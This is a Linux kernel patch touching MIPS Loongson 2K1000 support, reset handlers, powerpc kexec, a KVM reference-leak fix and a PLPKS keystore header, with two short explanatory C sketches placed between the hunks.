+-		reg = <0x00000000 0x00200000 0x00000000 0x0ee00000>, /* 238 MB at 2 MB */
+-			<0x00000000 0x20000000 0x00000000 0x1f000000>, /* 496 MB at 512 MB */
+-			<0x00000001 0x10000000 0x00000001 0xb0000000>; /* 6912 MB at 4352MB */
+-	};
+-
+ 	cpu_clk: cpu_clk {
+ 		#clock-cells = <0>;
+ 		compatible = "fixed-clock";
+@@ -52,6 +44,13 @@ package0: bus@10000000 {
+ 			0 0x40000000 0 0x40000000 0 0x40000000
+ 			0xfe 0x00000000 0xfe 0x00000000 0 0x40000000>;
+ 
++		isa@18000000 {
++			compatible = "isa";
++			#size-cells = <1>;
++			#address-cells = <2>;
++			ranges = <1 0x0 0x0 0x18000000 0x4000>;
++		};
++
+ 		pm: reset-controller@1fe07000 {
+ 			compatible = "loongson,ls2k-pm";
+ 			reg = <0 0x1fe07000 0 0x422>;
+@@ -130,7 +129,8 @@ gmac@3,0 {
+ 					     <13 IRQ_TYPE_LEVEL_LOW>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+-				phy-mode = "rgmii";
++				phy-mode = "rgmii-id";
++				phy-handle = <&phy1>;
+ 				mdio {
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+@@ -153,7 +153,8 @@ gmac@3,1 {
+ 					     <15 IRQ_TYPE_LEVEL_LOW>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+-				phy-mode = "rgmii";
++				phy-mode = "rgmii-id";
++				phy-handle = <&phy1>;
+ 				mdio {
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+diff --git a/arch/mips/include/asm/mach-loongson64/boot_param.h b/arch/mips/include/asm/mach-loongson64/boot_param.h
+index e007edd6b60a7..9218b3ae33832 100644
+--- a/arch/mips/include/asm/mach-loongson64/boot_param.h
++++ b/arch/mips/include/asm/mach-loongson64/boot_param.h
+@@ -42,12 +42,14 @@ enum loongson_cpu_type {
+ 	Legacy_1B = 0x5,
+ 	Legacy_2G = 0x6,
+ 	Legacy_2H = 0x7,
++	Legacy_2K = 0x8,
+ 	Loongson_1A = 0x100,
+ 	Loongson_1B = 0x101,
+ 	Loongson_2E = 0x200,
+ 	Loongson_2F = 0x201,
+ 	Loongson_2G = 0x202,
+ 	Loongson_2H = 0x203,
++	Loongson_2K = 0x204,
+ 	Loongson_3A = 0x300,
+ 	Loongson_3B = 0x301
+ };
+diff --git a/arch/mips/include/asm/mips-cm.h b/arch/mips/include/asm/mips-cm.h
+index 23c67c0871b17..696b40beb774f 100644
+--- a/arch/mips/include/asm/mips-cm.h
++++ b/arch/mips/include/asm/mips-cm.h
+@@ -228,6 +228,10 @@ GCR_ACCESSOR_RO(32, 0x0d0, gic_status)
+ GCR_ACCESSOR_RO(32, 0x0f0, cpc_status)
+ #define CM_GCR_CPC_STATUS_EX			BIT(0)
+ 
++/* GCR_ACCESS - Controls core/IOCU access to GCRs */
++GCR_ACCESSOR_RW(32, 0x120, access_cm3)
++#define CM_GCR_ACCESS_ACCESSEN			GENMASK(7, 0)
++
+ /* GCR_L2_CONFIG - Indicates L2 cache configuration when Config5.L2C=1 */
+ GCR_ACCESSOR_RW(32, 0x130, l2_config)
+ #define CM_GCR_L2_CONFIG_BYPASS			BIT(20)
+diff --git a/arch/mips/kernel/smp-cps.c b/arch/mips/kernel/smp-cps.c
+index bcd6a944b8397..739997e6fd655 100644
+--- a/arch/mips/kernel/smp-cps.c
++++ b/arch/mips/kernel/smp-cps.c
+@@ -230,7 +230,10 @@ static void boot_core(unsigned int core, unsigned int vpe_id)
+ 	write_gcr_co_reset_ext_base(CM_GCR_Cx_RESET_EXT_BASE_UEB);
+ 
+ 	/* Ensure the core can access the GCRs */
+-	set_gcr_access(1 << core);
++	if (mips_cm_revision() < CM_REV_CM3)
++		set_gcr_access(1 << core);
++	else
++		set_gcr_access_cm3(1 << core);
+ 
+ 	if (mips_cpc_present()) {
+ 		/* Reset the core */
+diff --git a/arch/mips/loongson64/env.c b/arch/mips/loongson64/env.c
+index ef3750a6ffacf..09ff052698614 100644
+--- a/arch/mips/loongson64/env.c
++++ b/arch/mips/loongson64/env.c
+@@ -88,6 +88,12 @@ void __init prom_lefi_init_env(void)
+ 	cpu_clock_freq = ecpu->cpu_clock_freq;
+ 	loongson_sysconf.cputype = ecpu->cputype;
+ 	switch (ecpu->cputype) {
++	case Legacy_2K:
++	case Loongson_2K:
++		smp_group[0] = 0x900000001fe11000;
++		loongson_sysconf.cores_per_node = 2;
++		loongson_sysconf.cores_per_package = 2;
++		break;
+ 	case Legacy_3A:
+ 	case Loongson_3A:
+ 		loongson_sysconf.cores_per_node = 4;
+@@ -221,6 +227,8 @@ void __init prom_lefi_init_env(void)
+ 		default:
+ 			break;
+ 		}
++	} else if ((read_c0_prid() & PRID_IMP_MASK) == PRID_IMP_LOONGSON_64R) {
++		loongson_fdt_blob = __dtb_loongson64_2core_2k1000_begin;
+ 	} else if ((read_c0_prid() & PRID_IMP_MASK) == PRID_IMP_LOONGSON_64G) {
+ 		if (loongson_sysconf.bridgetype == LS7A)
+ 			loongson_fdt_blob = __dtb_loongson64g_4core_ls7a_begin;
+diff --git a/arch/mips/loongson64/reset.c b/arch/mips/loongson64/reset.c
+index e420800043b08..2a8e4cd72605d 100644
+--- a/arch/mips/loongson64/reset.c
++++ b/arch/mips/loongson64/reset.c
+@@ -11,6 +11,7 @@
+ #include <linux/init.h>
+ #include <linux/kexec.h>
+ #include <linux/pm.h>
++#include <linux/reboot.h>
+ #include <linux/slab.h>
+ 
+ #include <asm/bootinfo.h>
+@@ -21,36 +22,21 @@
+ #include <loongson.h>
+ #include <boot_param.h>
+ 
+-static void loongson_restart(char *command)
++static int firmware_restart(struct sys_off_data *unusedd)
+ {
+ 
+ 	void (*fw_restart)(void) = (void *)loongson_sysconf.restart_addr;
+ 
+ 	fw_restart();
+-	while (1) {
+-		if (cpu_wait)
+-			cpu_wait();
+-	}
++	return NOTIFY_DONE;
+ }
+ 
+-static void loongson_poweroff(void)
++static int firmware_poweroff(struct sys_off_data *unused)
+ {
+ 	void (*fw_poweroff)(void) = (void *)loongson_sysconf.poweroff_addr;
+ 
+ 	fw_poweroff();
+-	while (1) {
+-		if (cpu_wait)
+-			cpu_wait();
+-	}
+-}
+-
+-static void loongson_halt(void)
+-{
+-	pr_notice("\n\n** You can safely turn off the power now **\n\n");
+-	while (1) {
+-		if (cpu_wait)
+-			cpu_wait();
+-	}
++	return NOTIFY_DONE;
+ }
+ 
+ #ifdef CONFIG_KEXEC
+@@ -154,9 +140,17 @@ static void loongson_crash_shutdown(struct pt_regs *regs)
+ 
+ static int __init mips_reboot_setup(void)
+ {
+-	_machine_restart = loongson_restart;
+-	_machine_halt = loongson_halt;
+-	pm_power_off = loongson_poweroff;
++	if (loongson_sysconf.restart_addr) {
++		register_sys_off_handler(SYS_OFF_MODE_RESTART,
++				 SYS_OFF_PRIO_FIRMWARE,
++				 firmware_restart, NULL);
++	}
++
++	if (loongson_sysconf.poweroff_addr) {
++		register_sys_off_handler(SYS_OFF_MODE_POWER_OFF,
++				 SYS_OFF_PRIO_FIRMWARE,
++				 firmware_poweroff, NULL);
++	}
+ 
+ #ifdef CONFIG_KEXEC
+ 	kexec_argv = kmalloc(KEXEC_ARGV_SIZE, GFP_KERNEL);
+diff --git a/arch/mips/loongson64/smp.c b/arch/mips/loongson64/smp.c
+index 660e1de4412a1..52dc959957838 100644
+--- a/arch/mips/loongson64/smp.c
++++ b/arch/mips/loongson64/smp.c
+@@ -479,12 +479,25 @@ static void loongson3_smp_finish(void)
+ static void __init loongson3_smp_setup(void)
+ {
+ 	int i = 0, num = 0; /* i: physical id, num: logical id */
++	int max_cpus = 0;
+ 
+ 	init_cpu_possible(cpu_none_mask);
+ 
++	for (i = 0; i < ARRAY_SIZE(smp_group); i++) {
++		if (!smp_group[i])
++			break;
++		max_cpus += loongson_sysconf.cores_per_node;
++	}
++
++	if (max_cpus < loongson_sysconf.nr_cpus) {
++		pr_err("SMP Groups are less than the number of CPUs\n");
++		loongson_sysconf.nr_cpus = max_cpus ? max_cpus : 1;
++	}
++
+ 	/* For unified kernel, NR_CPUS is the maximum possible value,
+ 	 * loongson_sysconf.nr_cpus is the really present value
+ 	 */
++	i = 0;
+ 	while (i < loongson_sysconf.nr_cpus) {
+ 		if (loongson_sysconf.reserved_cpus_mask & (1<<i)) {
+ 			/* Reserved physical CPU cores */
+@@ -505,14 +518,14 @@ static void __init loongson3_smp_setup(void)
+ 		__cpu_logical_map[num] = -1;
+ 		num++;
+ 	}
+-
+ 	csr_ipi_probe();
+ 	ipi_set0_regs_init();
+ 	ipi_clear0_regs_init();
+ 	ipi_status0_regs_init();
+ 	ipi_en0_regs_init();
+ 	ipi_mailbox_buf_init();
+-	ipi_write_enable(0);
++	if (smp_group[0])
++		ipi_write_enable(0);
+ 
+ 	cpu_set_core(&cpu_data[0],
+ 		     cpu_logical_map(0) % loongson_sysconf.cores_per_package);
+@@ -829,6 +842,9 @@ static int loongson3_disable_clock(unsigned int cpu)
+ 	uint64_t core_id = cpu_core(&cpu_data[cpu]);
+ 	uint64_t package_id = cpu_data[cpu].package;
+ 
++	if (!loongson_chipcfg[package_id] || !loongson_freqctrl[package_id])
++		return 0;
++
+ 	if ((read_c0_prid() & PRID_REV_MASK) == PRID_REV_LOONGSON3A_R1) {
+ 		LOONGSON_CHIPCFG(package_id) &= ~(1 << (12 + core_id));
+ 	} else {
+@@ -843,6 +859,9 @@ static int loongson3_enable_clock(unsigned int cpu)
+ 	uint64_t core_id = cpu_core(&cpu_data[cpu]);
+ 	uint64_t package_id = cpu_data[cpu].package;
+ 
++	if (!loongson_chipcfg[package_id] || !loongson_freqctrl[package_id])
++		return 0;
++
+ 	if ((read_c0_prid() & PRID_REV_MASK) == PRID_REV_LOONGSON3A_R1) {
+ 		LOONGSON_CHIPCFG(package_id) |= 1 << (12 + core_id);
+ 	} else {
+diff --git a/arch/mips/pci/pcie-octeon.c b/arch/mips/pci/pcie-octeon.c
+old mode 100755
+new mode 100644
+diff --git a/arch/mips/sgi-ip30/ip30-console.c b/arch/mips/sgi-ip30/ip30-console.c
+index b91f8c4fdc786..a087b7ebe1293 100644
+--- a/arch/mips/sgi-ip30/ip30-console.c
++++ b/arch/mips/sgi-ip30/ip30-console.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ 
+ #include <linux/io.h>
++#include <linux/processor.h>
+ 
+ #include <asm/sn/ioc3.h>
+ 
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index 5762633ea95e4..3341d4a421990 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -75,6 +75,7 @@ config PARISC
+ 	select HAVE_SOFTIRQ_ON_OWN_STACK if IRQSTACKS
+ 	select TRACE_IRQFLAGS_SUPPORT
+ 	select HAVE_FUNCTION_DESCRIPTORS if 64BIT
++	select PCI_MSI_ARCH_FALLBACKS if PCI_MSI
+ 
+ 	help
+ 	  The PA-RISC microprocessor is designed by Hewlett-Packard and used
+diff --git a/arch/powerpc/configs/85xx-hw.config b/arch/powerpc/configs/85xx-hw.config
+index 524db76f47b73..8aff832173977 100644
+--- a/arch/powerpc/configs/85xx-hw.config
++++ b/arch/powerpc/configs/85xx-hw.config
+@@ -24,6 +24,7 @@ CONFIG_FS_ENET=y
+ CONFIG_FSL_CORENET_CF=y
+ CONFIG_FSL_DMA=y
+ CONFIG_FSL_HV_MANAGER=y
++CONFIG_FSL_IFC=y
+ CONFIG_FSL_PQ_MDIO=y
+ CONFIG_FSL_RIO=y
+ CONFIG_FSL_XGMAC_MDIO=y
+@@ -58,6 +59,7 @@ CONFIG_INPUT_FF_MEMLESS=m
+ CONFIG_MARVELL_PHY=y
+ CONFIG_MDIO_BUS_MUX_GPIO=y
+ CONFIG_MDIO_BUS_MUX_MMIOREG=y
++CONFIG_MEMORY=y
+ CONFIG_MMC_SDHCI_OF_ESDHC=y
+ CONFIG_MMC_SDHCI_PLTFM=y
+ CONFIG_MMC_SDHCI=y
+diff --git a/arch/powerpc/include/asm/kexec.h b/arch/powerpc/include/asm/kexec.h
+index a1ddba01e7d13..f2db1b443920e 100644
+--- a/arch/powerpc/include/asm/kexec.h
++++ b/arch/powerpc/include/asm/kexec.h
+@@ -181,6 +181,10 @@ static inline void crash_send_ipi(void (*crash_ipi_callback)(struct pt_regs *))
+ 
+ #endif /* CONFIG_KEXEC_CORE */
+ 
++#if defined(CONFIG_KEXEC_FILE) || defined(CONFIG_CRASH_DUMP)
++int update_cpus_node(void *fdt);
++#endif
++
+ #ifdef CONFIG_PPC_BOOK3S_64
+ #include <asm/book3s/64/kexec.h>
+ #endif
+diff --git a/arch/powerpc/include/asm/plpks.h b/arch/powerpc/include/asm/plpks.h
+new file mode 100644
+index 0000000000000..9e2219b0202db
+--- /dev/null
++++ b/arch/powerpc/include/asm/plpks.h
+@@ -0,0 +1,163 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (C) 2022 IBM Corporation
++ * Author: Nayna Jain <nayna@linux.ibm.com>
++ *
++ * Platform keystore for pseries LPAR(PLPKS).
++ */
++
++#ifndef _ASM_POWERPC_PLPKS_H
++#define _ASM_POWERPC_PLPKS_H
++
++#ifdef CONFIG_PSERIES_PLPKS
++
++#include <linux/types.h>
++#include <linux/list.h>
++
++// Object policy flags from supported_policies
++#define PLPKS_OSSECBOOTAUDIT	PPC_BIT32(1) // OS secure boot must be audit/enforce
++#define PLPKS_OSSECBOOTENFORCE	PPC_BIT32(2) // OS secure boot must be enforce
++#define PLPKS_PWSET		PPC_BIT32(3) // No access without password set
++#define PLPKS_WORLDREADABLE	PPC_BIT32(4) // Readable without authentication
++#define PLPKS_IMMUTABLE		PPC_BIT32(5) // Once written, object cannot be removed
++#define PLPKS_TRANSIENT		PPC_BIT32(6) // Object does not persist through reboot
++#define PLPKS_SIGNEDUPDATE	PPC_BIT32(7) // Object can only be modified by signed updates
++#define PLPKS_HVPROVISIONED	PPC_BIT32(28) // Hypervisor has provisioned this object
++
++// Signature algorithm flags from signed_update_algorithms
++#define PLPKS_ALG_RSA2048	PPC_BIT(0)
++#define PLPKS_ALG_RSA4096	PPC_BIT(1)
++
++// Object label OS metadata flags
++#define PLPKS_VAR_LINUX		0x02
++#define PLPKS_VAR_COMMON	0x04
++
++// Flags for which consumer owns an object is owned by
++#define PLPKS_FW_OWNER			0x1
++#define PLPKS_BOOTLOADER_OWNER		0x2
++#define PLPKS_OS_OWNER			0x3
++
++// Flags for label metadata fields
++#define PLPKS_LABEL_VERSION		0
++#define PLPKS_MAX_LABEL_ATTR_SIZE	16
++#define PLPKS_MAX_NAME_SIZE		239
++#define PLPKS_MAX_DATA_SIZE		4000
++
++// Timeouts for PLPKS operations
++#define PLPKS_MAX_TIMEOUT		(5 * USEC_PER_SEC)
++#define PLPKS_FLUSH_SLEEP		10000 // usec
++
++struct plpks_var {
++	char *component;
++	u8 *name;
++	u8 *data;
++	u32 policy;
++	u16 namelen;
++	u16 datalen;
++	u8 os;
++};
++
++struct plpks_var_name {
++	u8  *name;
++	u16 namelen;
++};
++
++struct plpks_var_name_list {
++	u32 varcount;
++	struct plpks_var_name varlist[];
++};
++
++/**
++ * Writes the specified var and its data to PKS.
++ * Any caller of PKS driver should present a valid component type for
++ * their variable.
++ */
++int plpks_write_var(struct plpks_var var);
++
++/**
++ * Removes the specified var and its data from PKS.
++ */
++int plpks_remove_var(char *component, u8 varos,
++		     struct plpks_var_name vname);
++
++/**
++ * Returns the data for the specified os variable.
++ */
++int plpks_read_os_var(struct plpks_var *var);
++
++/**
++ * Returns the data for the specified firmware variable.
++ */
++int plpks_read_fw_var(struct plpks_var *var);
++
++/**
++ * Returns the data for the specified bootloader variable.
++ */
++int plpks_read_bootloader_var(struct plpks_var *var);
++
++/**
++ * Returns if PKS is available on this LPAR.
++ */
++bool plpks_is_available(void);
++
++/**
++ * Returns version of the Platform KeyStore.
++ */
++u8 plpks_get_version(void);
++
++/**
++ * Returns hypervisor storage overhead per object, not including the size of
++ * the object or label. Only valid for config version >= 2
++ */
++u16 plpks_get_objoverhead(void);
++
++/**
++ * Returns maximum password size. Must be >= 32 bytes
++ */
++u16 plpks_get_maxpwsize(void);
++
++/**
++ * Returns maximum object size supported by Platform KeyStore.
++ */
++u16 plpks_get_maxobjectsize(void);
++
++/**
++ * Returns maximum object label size supported by Platform KeyStore.
++ */
++u16 plpks_get_maxobjectlabelsize(void);
++
++/**
++ * Returns total size of the configured Platform KeyStore.
++ */
++u32 plpks_get_totalsize(void);
++
++/**
++ * Returns used space from the total size of the Platform KeyStore.
++ */
++u32 plpks_get_usedspace(void);
++
++/**
++ * Returns bitmask of policies supported by the hypervisor.
++ */
++u32 plpks_get_supportedpolicies(void);
++
++/**
++ * Returns maximum byte size of a single object supported by the hypervisor.
++ * Only valid for config version >= 3
++ */
++u32 plpks_get_maxlargeobjectsize(void);
++
++/**
++ * Returns bitmask of signature algorithms supported for signed updates.
++ * Only valid for config version >= 3
++ */
++u64 plpks_get_signedupdatealgorithms(void);
++
++/**
++ * Returns the length of the PLPKS password in bytes.
++ */
++u16 plpks_get_passwordlen(void);
++
++#endif // CONFIG_PSERIES_PLPKS
++
++#endif // _ASM_POWERPC_PLPKS_H
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 9531ab90feb8a..e5b90d67cd536 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -324,6 +324,7 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 					  void *data)
+ {
+ 	const char *type = of_get_flat_dt_prop(node, "device_type", NULL);
++	const __be32 *cpu_version = NULL;
+ 	const __be32 *prop;
+ 	const __be32 *intserv;
+ 	int i, nthreads;
+@@ -404,7 +405,7 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 		prop = of_get_flat_dt_prop(node, "cpu-version", NULL);
+ 		if (prop && (be32_to_cpup(prop) & 0xff000000) == 0x0f000000) {
+ 			identify_cpu(0, be32_to_cpup(prop));
+-			seq_buf_printf(&ppc_hw_desc, "0x%04x ", be32_to_cpup(prop));
++			cpu_version = prop;
+ 		}
+ 
+ 		check_cpu_feature_properties(node);
+@@ -415,6 +416,12 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	}
+ 
+ 	identical_pvr_fixup(node);
++
++	// We can now add the CPU name & PVR to the hardware description
++	seq_buf_printf(&ppc_hw_desc, "%s 0x%04lx ", cur_cpu_spec->cpu_name, mfspr(SPRN_PVR));
++	if (cpu_version)
++		seq_buf_printf(&ppc_hw_desc, "0x%04x ", be32_to_cpup(cpu_version));
++
+ 	init_mmu_slb_size(node);
+ 
+ #ifdef CONFIG_PPC64
+@@ -852,9 +859,6 @@ void __init early_init_devtree(void *params)
+ 
+ 	dt_cpu_ftrs_scan();
+ 
+-	// We can now add the CPU name & PVR to the hardware description
+-	seq_buf_printf(&ppc_hw_desc, "%s 0x%04lx ", cur_cpu_spec->cpu_name, mfspr(SPRN_PVR));
+-
+ 	/* Retrieve CPU related informations from the flat tree
+ 	 * (altivec support, boot CPU ID, ...)
+ 	 */
+diff --git a/arch/powerpc/kexec/core_64.c b/arch/powerpc/kexec/core_64.c
+index e465e44877376..653b3c8c6a530 100644
+--- a/arch/powerpc/kexec/core_64.c
++++ b/arch/powerpc/kexec/core_64.c
+@@ -17,6 +17,7 @@
+ #include <linux/cpu.h>
+ #include <linux/hardirq.h>
+ #include <linux/of.h>
++#include <linux/libfdt.h>
+ 
+ #include <asm/page.h>
+ #include <asm/current.h>
+@@ -31,6 +32,7 @@
+ #include <asm/hw_breakpoint.h>
+ #include <asm/svm.h>
+ #include <asm/ultravisor.h>
++#include <asm/crashdump-ppc64.h>
+ 
+ int machine_kexec_prepare(struct kimage *image)
+ {
+@@ -431,3 +433,113 @@ static int __init export_htab_values(void)
+ }
+ late_initcall(export_htab_values);
+ #endif /* CONFIG_PPC_64S_HASH_MMU */
++
++#if defined(CONFIG_KEXEC_FILE) || defined(CONFIG_CRASH_DUMP)
++/**
++ * add_node_props - Reads node properties from device node structure and add
++ *                  them to fdt.
++ * @fdt:            Flattened device tree of the kernel
++ * @node_offset:    offset of the node to add a property at
++ * @dn:             device node pointer
++ *
++ * Returns 0 on success, negative errno on error.
++ */
++static int add_node_props(void *fdt, int node_offset, const struct device_node *dn)
++{
++	int ret = 0;
++	struct property *pp;
++
++	if (!dn)
++		return -EINVAL;
++
++	for_each_property_of_node(dn, pp) {
++		ret = fdt_setprop(fdt, node_offset, pp->name, pp->value, pp->length);
++		if (ret < 0) {
++			pr_err("Unable to add %s property: %s\n", pp->name, fdt_strerror(ret));
++			return ret;
++		}
++	}
++	return ret;
++}
++
++/**
++ * update_cpus_node - Update cpus node of flattened device tree using of_root
++ *                    device node.
++ * @fdt:              Flattened device tree of the kernel.
++ *
++ * Returns 0 on success, negative errno on error.
++ *
++ * Note: expecting no subnodes under /cpus/<node> with device_type == "cpu".
++ * If this changes, update this function to include them.
++ */
++int update_cpus_node(void *fdt)
++{
++	int prev_node_offset;
++	const char *device_type;
++	const struct fdt_property *prop;
++	struct device_node *cpus_node, *dn;
++	int cpus_offset, cpus_subnode_offset, ret = 0;
++
++	cpus_offset = fdt_path_offset(fdt, "/cpus");
++	if (cpus_offset < 0 && cpus_offset != -FDT_ERR_NOTFOUND) {
++		pr_err("Malformed device tree: error reading /cpus node: %s\n",
++		       fdt_strerror(cpus_offset));
++		return cpus_offset;
++	}
++
++	prev_node_offset = cpus_offset;
++	/* Delete sub-nodes of /cpus node with device_type == "cpu" */
++	for (cpus_subnode_offset = fdt_first_subnode(fdt, cpus_offset); cpus_subnode_offset >= 0;) {
++		/* Ignore nodes that do not have a device_type property or device_type != "cpu" */
++		prop = fdt_get_property(fdt, cpus_subnode_offset, "device_type", NULL);
++		if (!prop || strcmp(prop->data, "cpu")) {
++			prev_node_offset = cpus_subnode_offset;
++			goto next_node;
++		}
++
++		ret = fdt_del_node(fdt, cpus_subnode_offset);
++		if (ret < 0) {
++			pr_err("Failed to delete a cpus sub-node: %s\n", fdt_strerror(ret));
++			return ret;
++		}
++next_node:
++		if (prev_node_offset == cpus_offset)
++			cpus_subnode_offset = fdt_first_subnode(fdt, cpus_offset);
++		else
++			cpus_subnode_offset = fdt_next_subnode(fdt, prev_node_offset);
++	}
++
++	cpus_node = of_find_node_by_path("/cpus");
++	/* Fail here to avoid kexec/kdump kernel boot hung */
++	if (!cpus_node) {
++		pr_err("No /cpus node found\n");
++		return -EINVAL;
++	}
++
++	/* Add all /cpus sub-nodes of device_type == "cpu" to FDT */
++	for_each_child_of_node(cpus_node, dn) {
++		/* Ignore device nodes that do not have a device_type property
++		 * or device_type != "cpu".
++		 */
++		device_type = of_get_property(dn, "device_type", NULL);
++		if (!device_type || strcmp(device_type, "cpu"))
++			continue;
++
++		cpus_subnode_offset = fdt_add_subnode(fdt, cpus_offset, dn->full_name);
++		if (cpus_subnode_offset < 0) {
++			pr_err("Unable to add %s subnode: %s\n", dn->full_name,
++			       fdt_strerror(cpus_subnode_offset));
++			ret = cpus_subnode_offset;
++			goto out;
++		}
++
++		ret = add_node_props(fdt, cpus_subnode_offset, dn);
++		if (ret < 0)
++			goto out;
++	}
++out:
++	of_node_put(cpus_node);
++	of_node_put(dn);
++	return ret;
++}
++#endif /* CONFIG_KEXEC_FILE || CONFIG_CRASH_DUMP */
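
The deletion loop in update_cpus_node() above has to cope with fdt_del_node() invalidating node offsets, so after every removal it re-fetches the next candidate from the last surviving subnode (or from /cpus itself). A minimal userspace sketch of the same delete-while-iterating pattern, using a hypothetical linked list rather than libfdt:

#include <stdio.h>
#include <stdlib.h>

struct node { int keep; struct node *next; };

/* Removal invalidates the cursor, so remember the last *kept*
 * element and re-fetch the next candidate from it (or from the
 * head) after each unlink -- the shape of the fdt loop above. */
static void prune(struct node **head)
{
        struct node *prev = NULL, *cur = *head;

        while (cur) {
                if (cur->keep) {                /* survivor: advance */
                        prev = cur;
                        cur = cur->next;
                        continue;
                }
                if (prev)                       /* unlink, then re-fetch */
                        prev->next = cur->next;
                else
                        *head = cur->next;
                free(cur);
                cur = prev ? prev->next : *head;
        }
}

int main(void)
{
        struct node *n2 = malloc(sizeof(*n2));
        struct node *n1 = malloc(sizeof(*n1));
        struct node *head = n1;

        *n1 = (struct node){ .keep = 0, .next = n2 };
        *n2 = (struct node){ .keep = 1, .next = NULL };
        prune(&head);
        printf("remaining node keep=%d\n", head->keep);
        free(head);
        return 0;
}
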
+diff --git a/arch/powerpc/kexec/file_load_64.c b/arch/powerpc/kexec/file_load_64.c
+index 349a781cea0b3..180c1dfe4aa77 100644
+--- a/arch/powerpc/kexec/file_load_64.c
++++ b/arch/powerpc/kexec/file_load_64.c
+@@ -952,93 +952,6 @@ unsigned int kexec_extra_fdt_size_ppc64(struct kimage *image)
+ 	return (unsigned int)(usm_entries * sizeof(u64));
+ }
+ 
+-/**
+- * add_node_props - Reads node properties from device node structure and add
+- *                  them to fdt.
+- * @fdt:            Flattened device tree of the kernel
+- * @node_offset:    offset of the node to add a property at
+- * @dn:             device node pointer
+- *
+- * Returns 0 on success, negative errno on error.
+- */
+-static int add_node_props(void *fdt, int node_offset, const struct device_node *dn)
+-{
+-	int ret = 0;
+-	struct property *pp;
+-
+-	if (!dn)
+-		return -EINVAL;
+-
+-	for_each_property_of_node(dn, pp) {
+-		ret = fdt_setprop(fdt, node_offset, pp->name, pp->value, pp->length);
+-		if (ret < 0) {
+-			pr_err("Unable to add %s property: %s\n", pp->name, fdt_strerror(ret));
+-			return ret;
+-		}
+-	}
+-	return ret;
+-}
+-
+-/**
+- * update_cpus_node - Update cpus node of flattened device tree using of_root
+- *                    device node.
+- * @fdt:              Flattened device tree of the kernel.
+- *
+- * Returns 0 on success, negative errno on error.
+- */
+-static int update_cpus_node(void *fdt)
+-{
+-	struct device_node *cpus_node, *dn;
+-	int cpus_offset, cpus_subnode_offset, ret = 0;
+-
+-	cpus_offset = fdt_path_offset(fdt, "/cpus");
+-	if (cpus_offset < 0 && cpus_offset != -FDT_ERR_NOTFOUND) {
+-		pr_err("Malformed device tree: error reading /cpus node: %s\n",
+-		       fdt_strerror(cpus_offset));
+-		return cpus_offset;
+-	}
+-
+-	if (cpus_offset > 0) {
+-		ret = fdt_del_node(fdt, cpus_offset);
+-		if (ret < 0) {
+-			pr_err("Error deleting /cpus node: %s\n", fdt_strerror(ret));
+-			return -EINVAL;
+-		}
+-	}
+-
+-	/* Add cpus node to fdt */
+-	cpus_offset = fdt_add_subnode(fdt, fdt_path_offset(fdt, "/"), "cpus");
+-	if (cpus_offset < 0) {
+-		pr_err("Error creating /cpus node: %s\n", fdt_strerror(cpus_offset));
+-		return -EINVAL;
+-	}
+-
+-	/* Add cpus node properties */
+-	cpus_node = of_find_node_by_path("/cpus");
+-	ret = add_node_props(fdt, cpus_offset, cpus_node);
+-	of_node_put(cpus_node);
+-	if (ret < 0)
+-		return ret;
+-
+-	/* Loop through all subnodes of cpus and add them to fdt */
+-	for_each_node_by_type(dn, "cpu") {
+-		cpus_subnode_offset = fdt_add_subnode(fdt, cpus_offset, dn->full_name);
+-		if (cpus_subnode_offset < 0) {
+-			pr_err("Unable to add %s subnode: %s\n", dn->full_name,
+-			       fdt_strerror(cpus_subnode_offset));
+-			ret = cpus_subnode_offset;
+-			goto out;
+-		}
+-
+-		ret = add_node_props(fdt, cpus_subnode_offset, dn);
+-		if (ret < 0)
+-			goto out;
+-	}
+-out:
+-	of_node_put(dn);
+-	return ret;
+-}
+-
+ static int copy_property(void *fdt, int node_offset, const struct device_node *dn,
+ 			 const char *propname)
+ {
+diff --git a/arch/powerpc/kvm/powerpc.c b/arch/powerpc/kvm/powerpc.c
+index b850b0efa201a..98ac5d39ad9cf 100644
+--- a/arch/powerpc/kvm/powerpc.c
++++ b/arch/powerpc/kvm/powerpc.c
+@@ -1998,8 +1998,10 @@ static int kvm_vcpu_ioctl_enable_cap(struct kvm_vcpu *vcpu,
+ 			break;
+ 
+ 		r = -ENXIO;
+-		if (!xive_enabled())
++		if (!xive_enabled()) {
++			fdput(f);
+ 			break;
++		}
+ 
+ 		r = -EPERM;
+ 		dev = kvm_device_from_filp(f.file);
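
The fix above pairs the fdget() taken earlier in kvm_vcpu_ioctl_enable_cap() with an fdput() on the newly handled !xive_enabled() exit; the bug class is a reference taken at the top of a function leaking on one early-return path. A minimal userspace sketch of the same pairing, with a hypothetical parse_header() standing in for the ioctl handler:

#include <errno.h>
#include <stdio.h>

/* Every early exit must drop the reference taken at the top,
 * mirroring the fdget()/fdput() pairing in the hunk above. */
static int parse_header(const char *path)
{
        FILE *f = fopen(path, "rb");    /* takes the reference */
        unsigned char magic;
        int ret = 0;

        if (!f)
                return -errno;

        if (fread(&magic, 1, 1, f) != 1) {
                ret = -EIO;
                goto out;               /* error path releases too */
        }
        if (magic != 0x7f)
                ret = -EINVAL;
out:
        fclose(f);                      /* single release point */
        return ret;
}

int main(void)
{
        return parse_header("/bin/sh") ? 1 : 0;
}
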
+diff --git a/arch/powerpc/platforms/pseries/plpks.c b/arch/powerpc/platforms/pseries/plpks.c
+index 25f95440a773b..d1eb6f0433fe7 100644
+--- a/arch/powerpc/platforms/pseries/plpks.c
++++ b/arch/powerpc/platforms/pseries/plpks.c
+@@ -18,15 +18,23 @@
+ #include <linux/types.h>
+ #include <asm/hvcall.h>
+ #include <asm/machdep.h>
+-
+-#include "plpks.h"
++#include <asm/plpks.h>
++#include <asm/firmware.h>
+ 
